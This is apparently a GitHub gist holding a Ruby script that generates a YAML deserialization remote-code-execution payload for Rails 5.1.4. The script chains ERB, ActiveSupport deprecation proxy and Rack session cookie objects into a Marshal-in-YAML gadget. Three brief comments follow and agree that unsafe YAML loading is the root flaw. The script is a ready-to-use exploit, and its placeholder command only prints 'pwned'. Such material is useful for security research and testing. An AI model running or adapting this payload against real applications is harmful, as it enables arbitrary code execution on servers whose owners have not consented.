Instantly share code, notes, and snippets.

Embed
What would you like to do?
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
def initialize(instance, method)
@instance = instance
@method = method
@deprecator = ActiveSupport::Deprecation.new
end
end
end
end
code = <<-EOS
puts "pwned"
EOS
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@lineno, 1337
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "")
payload = <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
!ruby/object:Rack::Session::Abstract::SessionHash
req: !ruby/object:Rack::Request
env:
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash
id: 'hi from espr'
HTTP_COOKIE: "a=#{payload}"
store: !ruby/object:Rack::Session::Cookie
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
key: a
secrets: []
exists: true
loaded: false
PAYLOAD
puts payload
@RicterZ

This comment has been minimized.

Show comment
Hide comment
@RicterZ

RicterZ Nov 21, 2017

A 0-day? I couldn't find any information about this security issue on Rails official website or Github.

RicterZ commented Nov 21, 2017

A 0-day? I couldn't find any information about this security issue on Rails official website or Github.

@niklasb

This comment has been minimized.

Show comment
Hide comment
@niklasb

niklasb May 31, 2018

@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload

Owner

niklasb commented May 31, 2018

@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload

@g0rx

This comment has been minimized.

Show comment
Hide comment
@g0rx

g0rx Sep 13, 2018

RicterZ kinda off ; problem start from 2013 but seem new load untrusted YAML , too bad

g0rx commented Sep 13, 2018

RicterZ kinda off ; problem start from 2013 but seem new load untrusted YAML , too bad

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment